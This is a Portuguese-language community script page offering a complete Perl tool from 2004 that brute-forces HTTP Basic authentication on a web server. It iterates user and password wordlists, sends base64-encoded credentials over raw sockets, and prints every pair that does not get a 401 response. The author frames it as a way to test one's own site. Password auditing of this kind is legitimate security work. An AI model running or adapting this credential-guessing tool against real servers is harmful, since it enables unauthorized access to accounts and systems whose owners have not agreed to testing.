brute_basic
Publicado por Marcelo 25/01/2004
[ Hits: 6.338 ]
Script que faz brute-force em autenticação via web do tipo Basic (digest ainda não foi incluído), o script precisa de duas listas de nomes, para usuários e senhas, você pode escolher entre método HEAD e GET (alguns sites bloqueiam HEAD), mas como o script ainda não trabalha com threads, ele é extremamente lento para grandes brute-forces, por isso é mais recomendado para testar o seu próprio website, o script utiliza HTTP 1.1, espero que em próximas versões eu inclua threads...
#!/usr/bin/perl
use Socket;
use IO::Socket;
use MIME::Base64;
if ($ARGV[3] =~ /g/) { $metodo='GET'; print "Utilizando método GET ao invés de H
EAD\n"; }
else { $metodo='HEAD'; }
open(logins,$ARGV[1]);
@url=split(/\//,$ARGV[0]);
$get='/';
$ip=gethostbyname($url[0]);
if ($ip) { $ip=inet_ntoa($ip); }
else {
print "Erro no DNS ao tentar resolver $url[0]!\n";
exit(1);
}
for ($i=1;$url[$i];$i++) {
$get="$get/$url[$i]";
}
if (substr($ARGV[0],(length($ARGV[0])-1)) eq '/') { $get="$get/"; }
print "Iniciando tentativa de brute-force em $url[0]\n";
for ($nl=0;($user=<logins>);$nl++) {
chop $user;
close(senhas);
open(senhas,$ARGV[2]);
for ($np=0;($senha=<senhas>);$np++) {
chop $senha;
$final=encode_base64("$user:$senha");
$sock=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>80,Timeout=>3);
if ($sock) { print $sock "$metodo $get HTTP/1.1\nHost: $url[0]\nAuthorization:
Basic $final\n\n"; }
@div=split(/ /,<$sock>);
if ($div[1] eq '403') {
print "Forbidden retornado do servidor, pode ser um anti brute-force\n";
}
elsif ($div[1] eq '405') {
print "O método $metodo não é permitido pelo servidor:\n";
if ($metodo eq 'HEAD') {
print "Tente usar a opção -g no final, que utiliza GET";
}
else {
print "Alguma coisa muito estranha está acontecendo... o servidor não suporta o método GET, não é impossível, mas simplesmente inútil e impede a navegação normal. Verifique se está tudo certo e se o site é navegável!";
}
print "\nFechando o brute-force.\n";
exit(1);
}
else {
if ($div[1] ne '401') {
print "$user:$senha -> OK! <-> Retorno: $div[1]\n";
$a++;
}
}
# print "$div[0] $div[1] $div[2]\n";
close($sock);
}
}
if (!$a) { $a=0; }
print "Programa terminado, combinações tentadas: ".($nl*$np).", senhas achadas: $a\n";
Script de Analise do Syslog SNORT
Nenhum comentário foi encontrado.
Patrocínio
Destaques
Artigos
Como gerar um podcast a partir de um livro em PDF
Automatizando digitação de códigos 2FA no browser
Resolver problemas de Internet
Como compartilhar a tela do Ubuntu com uma Smart TV (LG, Samsung, etc.)
Dicas
Músicas de Andrew Hulshult no DOOM (WAD)
Instalar o Apache, MySQL e PHP no Oracle Linux 8
Bloqueando telemetria no Deepin 23.1
Como converter imagens PNG/JPEG para SVG em linha de comando
Fez porcaria no teu repositório Git? Aprenda a restaurar uma versão anterior do seu código!
Tópicos
Java é uma linguagem de brinquedo? (9)
Rejeição de acesso ao servidor (1)
Alguém pode me explicar essa matemática? (2)
Top 10 do mês
-
Xerxes
1° lugar - 72.801 pts -
Fábio Berbert de Paula
2° lugar - 54.741 pts -
Buckminster
3° lugar - 19.939 pts -
Mauricio Ferrari
4° lugar - 16.873 pts -
Alberto Federman Neto.
5° lugar - 14.855 pts -
Daniel Lara Souza
6° lugar - 13.650 pts -
Diego Mendes Rodrigues
7° lugar - 13.177 pts -
Alessandro de Oliveira Faria (A.K.A. CABELO)
8° lugar - 13.178 pts -
edps
9° lugar - 13.112 pts -
Andre (pinduvoz)
10° lugar - 10.446 pts
Scripts
A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.
Site hospedado por:
